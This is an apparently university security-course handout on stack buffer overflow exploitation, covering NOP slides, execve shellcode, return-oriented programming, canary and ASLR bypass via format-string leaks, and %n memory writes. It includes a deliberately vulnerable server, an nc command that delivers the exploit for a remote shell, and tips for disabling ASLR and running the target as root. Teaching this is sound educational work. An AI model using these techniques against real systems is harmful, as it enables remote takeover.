Class 11: Exploit¶
Date: 13.05.2025
Additional materials¶
Program stack¶
Every process has a stack, provided by the operating system. It is nothing more than a mapped, continuous segment of the process's address space and a set stack register (for the purpose of this scenario - SP). Local variables, return addresses of currently executing functions, and partial results of calculations are stored on the stack. The implementation of operations is trivial:
putting data onto the stack means writing to the memory pointed to by the SP register and modifying this register by the size of the written data
taking data from the stack means reading from under SP and modifying SP by the size of the data being taken
The operating system maps a predetermined amount of memory for the stack for programs (around 2 pages), and allocates subsequent memory pages only when needed.
i386¶
For the purposes of this scenario, we will focus on x86 architectures:
SP points to the byte at the top of the stack
the stack grows downwards, meaning putting data onto the stack decreases SP
on Linux and BSD, the function caller should (in the classic case, more in [1]):
save the contents of registers other than BP, SI, DI, BX (if it will want to use them later)
put arguments onto the stack in reverse order of function declaration
jump to the body of the called function, putting the current location in the program code onto the stack (return address)
upon return of the called function - remove arguments from the stack (result is in AX)
the called function should:
save registers BP, SI, DI, BX if it intends to change them
optionally set the BP register to the content of SP (needed to obtain stack-traces, simplifies assembler code, but is not mandatory; in gcc, generating such code can be disabled with the
-fomit-frame-pointer
flag)reserve space on the stack for local variables (by shifting SP)
execute its body
restore registers
put the result into AX
jump to the address from the top of the stack - the return address, the one placed by the caller
x86_64¶
In the x86_64 architecture, function calls look very similar, with the difference that the first 6 arguments are passed through registers RDI, RSI, RDX, RCX, R8, R9 (or XMM0-7 for floating-point types, respectively). If a function has more arguments, they are passed via the stack - just like in i386. Of course, all addresses are 8 bytes.
Disadvantages and advantages of the stack¶
As can be seen from this scenario, allocating local variables is very fast, because it boils down to modifying one register, and as long as local variables are multiples of the processor's word size, there is no fragmentation problem. These two features give stack allocation a significant advantage over heap allocation - malloc needs complex memory management logic and it is difficult to avoid fragmentation. Nevertheless, the stack is not suitable for holding variables whose lifespan exceeds a single function call. Another feature of the stack is the ease of predicting the arrangement of program data on it and, in the case of a poorly written program, using this knowledge to take control of the program.
Buffer overflow¶
This term refers to a situation where, for some reason, the program "forgets" the actual size of a buffer and exceeds its boundaries, accessing memory that does not belong to it. Example:
char c[5];
strcpy(c, "12345");
strcpy()
copies a string to the buffer passed as the first argument, along
with the terminating null byte, so in this case, 6 characters into a 5-element
buffer.
The language specification usually says nothing about this, but compilers behave
predictably, and it is easy to guess how variables are arranged relative to each
other on the stack (usually sequentially).
Such a situation causes a particular case of buffer overflow - stack buffer
overflow, to be easily exploitable, because by exceeding the buffer boundary
sufficiently, one can overwrite the return address from the function.
If done skillfully, one can take control of the program, because the ret mnemonic
in the attacked program's code will cause a jump to the location written in the
return address.
inetd¶
inetd
is a standard Unix daemon, a so-called superserver. In the
inetd.conf
configuration file, programs are assigned to various network
services, e.g.,
proftpd to the ftp service. inetd
listens on the appropriate
ports and upon establishing a connection, it starts the program appropriate for
the service with descriptors 0 and 1 set so that the program sends data over the
network by writing to standard output and reads data by reading from standard
input.
This approach used to be much more popular than it is today,
although this daemon is still common.
A newer version of the daemon is called
xinetd
and differs mainly in the configuration method - instead of one
common inetd.conf
file, each service has a separate file in the
xinetd.d
directory.
Writing an exploit¶
Exploit - colloquial name for a program that exploits a vulnerability in another
program.
If we are able to track down a situation that allows arbitrary
exceeding of a buffer size, we can overwrite the return address in such a way
that the program does what the attacker wants.
For simplicity, let's assume we are dealing with the following code (server.c
):
int test()
{
char buf[128];
if (scanf("%s", buf) == EOF)
return 0;
printf(buf);
return 1;
}
int main()
{
while (test()) {
fflush(stdout);
}
return 0;
}
We assume that this code is run via inetd. Our goal will be to obtain everything that the user in whose name this program runs can obtain. A sketch of what we will write:
we will send code to be executed (the so-called payload)
in addition to the payload, we will send such data that instead of returning from the
test()
function, the payload is executed
Problems:
check how much garbage needs to be inserted before the fake return address in the malicious message to hit the right spot on the stack
find out what to overwrite the return address with to jump to the payload
write a payload that does something sensible
Finding out where the return address is, having the source code, is easy - just count, keeping in mind how function calls look on x86. When there is no code, this can be done by dumping memory (the stack) and from the end of the stack (it is known, because the SP register is known) look for 4/8-byte aligned numbers that point to the memory area where the program code is mapped. A bigger problem is finding out where to jump, because:
the stack address is assigned by the operating system
at first glance, it is not clear what is on the stack below the
main
functioneven if, by reading the libc and kernel code, we find out what and how much is on the stack below the main function, it will turn out that it is not a constant number, because it depends, for example, on:
the size of arguments passed to the program
the environment
Fortunately, a large part of systems always have the stack start address the same - close to the end of the process's virtual space, so the fluctuations in the position of this buffer cannot be very large - they depend mainly on the environment and program arguments. Hence, the fluctuations in the buffer address can be reasonably estimated - just run the program with an empty environment in the / directory, without arguments, and check the address of any local variable. It is almost certain that the stack below the main function will not be larger. We thus have one limitation, and as the second, a reasonable limitation on the environment and arguments should be accepted. For simplicity, for now, we ignore the fact that in most systems, the stack address is currently random (within a certain range). If we thus create such a situation on the stack:
Before attack |
After attack |
---|---|
? |
|
payload |
|
? |
NOP |
? |
NOP |
? |
NOP |
? |
NOP |
? |
NOP |
? |
NOP |
? |
NOP |
? |
NOP |
? |
NOP |
? |
NOP |
return address |
malicious return address |
optionally saved registers |
garbage |
buffer |
garbage |
(NOP corresponds to some operation that does nothing)
it is enough for the malicious return address to point to any NOP instruction. If there are enough of them, we can thus eliminate the fluctuations in the buffer address. This technique, which involves inserting a large number of NOPs into the buffer, is called a nop-slide, because figuratively speaking, we slide down the NOPs to the payload.
Technical details¶
Tools:
objdump
: program disassembling compiled programs - will be useful for analysis, especially with the-d
flagulimit
: program managing user limits - only to ask the kernel to make memory dumps (core dump) in case the program crashes - useful in debugging (-c
flag)gdb
: debugging with the ability to load a memory dumpgcc
: for compiling programs, including the payload/proc/self/maps
: this file in Linux shows process memory mappings, which allows to see where the stack startsnetcat
(nc
): program that will be used to send the exploit over the network
Step-by-step implementation¶
The simplest and most effective payload will be launching a shell,
i.e., executing execve
. Since the launched program inherits descriptors,
and the program launched in inetd uses descriptors 0, 1, and 2 for network
communication, calling execve
will achieve an effect similar to a remote
shell.
Since it is not clear where the PLT is located (because it depends on the
compiler and very minor code changes) and even less clear where the libc
library code is mapped, it is better to call syscalls manually - bypassing
the wrappers provided by the standard library.
Details were discussed in the second class.
Knowing how to execute a syscall, one should write a program in assembler
that will execute execve
on /bin/sh
.
An example is in the payload.s
file.
The executable code of this program will be our payload. Using make show-payload, you can see this code in a format suitable for saving in C.
The demo.c
file shows how to directly transfer control to this code
(brute_force
function) and how to overwrite the return address with the
payload address.
The address used there is solely a result of calculating what is on the stack
according to the calling convention given at the beginning.
At this stage, we assume that the payload will be placed in executable memory.
In the following part, we will discuss how to bypass this limitation.
The last thing is to deliver the payload to the program from outside, along with
the malicious return address and the NOP-slide.
The address location in the buffer is a direct result of the demo.c example. The
address itself, however, was experimentally verified by checking the address of
a local variable in the main()
function.
This can be seen in the exploit.py
file. After sending the malicious data,
we need to be able to send commands somehow; this can be done as follows:
(./exploit.py; cat) |
./server
Network attack¶
To achieve the same effect over the network (inetd), you need to experiment a bit with the buffer size (the size of the NOP-slide) and the address to jump to. Then it is enough to use netcat (nc command) to interact with the remotely running server, which will later be a shell. To do this, run:
nc -c "./exploit.py;socat STDIO OPEN:/dev/tty" server_address port
If everything goes well, the result will be exploiting the vulnerability of a 20-line program to take control of a remote computer.
Non-executable stack (NX)¶
One of the mechanisms that is supposed to make these types of attacks more
difficult is marking which memory pages cannot be executed (NX flag).
In particular, the stack normally does not contain program code, so it can be
marked as such.
However, this does not prevent the attack, it only makes it a little more
difficult - we cannot jump directly to the sent payload, but we can use
everything that is already loaded in memory and marked as executable - in
particular, the standard library (directly or via PLT).
On the i386 architecture, one can simply prepare a jump to e.g.,
the system()
function from libc at the return address location and place
arguments a bit further.
Here, the address of the string /bin/sh
or another equally useful string
is needed.
Since the exact stack address is not known, one cannot (directly) provide
this string oneself.
But a moment of searching will show that the necessary string is in the
standard library:
$ xxd /lib64/libc.so.6|grep -A 1 /bin
01841a0: 6974 7900 6e61 6e00 2d63 002f 6269 6e2f ity.nan.-c./bin/
01841b0: 7368 0065 7869 7420 3000 4d53 4756 4552 sh.exit 0.MSGVER
In the case of the x86_64 architecture, it is a bit more complicated because initial parameters are passed through registers. But again, using what is already executable in memory, one can search for instruction sets that load data from the stack into registers. This technique is known as Return Oriented Programming, because the searched instruction sets (so-called gadgets) will most often be in the form of:
pop ...
ret
In this way, by placing gadget addresses and data alternately on the stack, we
can load the desired data.
Sometimes gadgets can be more complex, but to find the simplest ones, we can
prepare a source file with the sought instructions (gadgets.s
), compile it,
and then search the process memory using the searchmem
function from the
peda extension to GDB:
$ objdump -d gadgets.o
(...)
0000000000000000 <main>:
0: 5f pop %rdi
1: c3
retq
2: 5e pop %rsi
3: c3 retq
gdb-peda$ searchmem "\x5f\xc3"
Searching for '_\xc3' in: None ranges
Found 543 results, display max 256 items:
server : 0x4007a3 (<__libc_csu_init+99>: pop rdi)
server : 0x6007a3 --> 0x841f0f2e6666c35f
libc : 0x7ffff7a3edd5 (<iconv+165>: pop rdi)
libc : 0x7ffff7a3ee02 (<iconv+210>: pop rdi)
(...)
gdb-peda$ searchmem "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7ba21ab --> 0x68732f6e69622f ('/bin/sh')
An example using this technique is in the exploit-rop.py
file.
Stack protector and address space randomization (ASLR)¶
GCC has the -fstack-protector
option, which causes gcc, when starting the
execution of each function, to place a "canary" on the stack, which is a
predetermined number that is checked before exiting the function to see if it
has been changed.
However, if there is a bug in the program that allows a memory segment containing
the "canary" to leak, this mechanism becomes useless.
It so happens that the test program server.c
contains such a bug - having
control over the format string for printf()
, any memory segment can be printed.
An example is in exploit-rop-stack-protector.py
.
Another mechanism that makes attacks more difficult is address space
randomization (ASLR).
Here, in turn, it makes it harder to know the addresses to which one could
conveniently jump.
And again, the existence of a bug allowing a memory segment to be read is enough
to bypass this mechanism - having any address from the process's address space,
one can check what should be there and calculate the remaining addresses based
on that.
An example is in
exploit-rop-stack-protector-aslr.py
.
Format string¶
Not only buffer overflow is a dangerous vulnerability.
As seen earlier, giving control over the format string for printf()
greatly
facilitates attacks.
But such a vulnerability in itself can be used to take control of the program.
Firstly, sensitive data (e.g., passwords) may be present in memory, and
secondly, the %n
format allows modifying memory.
Exploiting this is made easier by the fact that field width can additionally
be taken from printf parameters (e.g., %*d
), and that the parameter number
to be used can be specified (e.g., %4$d
, or %*5$d
- combinations are also
possible: %4$*5$d
).
As a result, a primitive for copying data on the stack can be assembled from
this:
- read data by printing a field of appropriate width: %*15$d
- then the number thus "read" can be written using %23$n
If only interesting addresses are on the stack (or can be assembled using the
above), memory can be modified arbitrarily in practice.
An example program for experiments is in login.c
. It is a simple tool that
checks a hardcoded password hash and, if it matches, launches a shell.
It is intended to be installed with the SUID bit set.
Additionally, to be more user-friendly, you can provide your own password prompt
text.
The goal of the attack is, of course, to bypass the password. To do this,
one must find the address of the variable responsible for admitting the user on
the stack, and then provide such a parameter as to overwrite this variable.
Moral¶
The above examples show how dangerous careless programming is. Although this is an example for the purpose of a course, the mechanism is common, used, and ubiquitous. Security reports from internet portals such as Secunia confirm this.
Can we defend against this in any way? There are many methods; unfortunately, they only make the work of hackers more difficult but do not prevent it:
stack randomization (the start of the stack is in a different place in each process)
randomization of the entire address space - including the mapping location of libraries and the program loading location
NX bit (newer processors allow marking a segment of the virtual space (stack) as Non-eXecutable, which will cause an error when trying to execute the payload)
gcc has the
-fstack-protector
option, which causes gcc, when starting the execution of each function, to place a "canary" on the stack, which is a predetermined number that is checked before exiting the function to see if it has been changedgcc and glibc have protection against format string attacks, activated by the compilation option
-D_FORTIFY_SOURCE=2
resolving all relocations early and switching the entire GOT and PLT to read-only
A quite good way to avoid memory management errors (including buffer overflow) is to use languages that handle this themselves, such as Java, Python, etc. Of course, this will not protect against errors in the implementation of such a compiler/interpreter itself.
Tips¶
to disable stack randomization, change kernel settings:
sysctl -w kernel.randomize_va_space=0
to add an ftp-like server on port 21 to inetd, add the line:
ftp stream tcp nowait root /root/server
for the
xinetd
version, analogous configuration will require/etc/xinetd.d/ftp
:service ftp { disable = no id = ftp wait = yes socket_type = stream user = root group = root server = /root/server #server_args = }
when working with gdb, the "peda" extension (Python Exploit Development Assistance for GDB) is very useful - https://github.com/longld/peda
in the payload, be careful with whitespace -
scanf()
will stop reading the rest of the characters at the first such character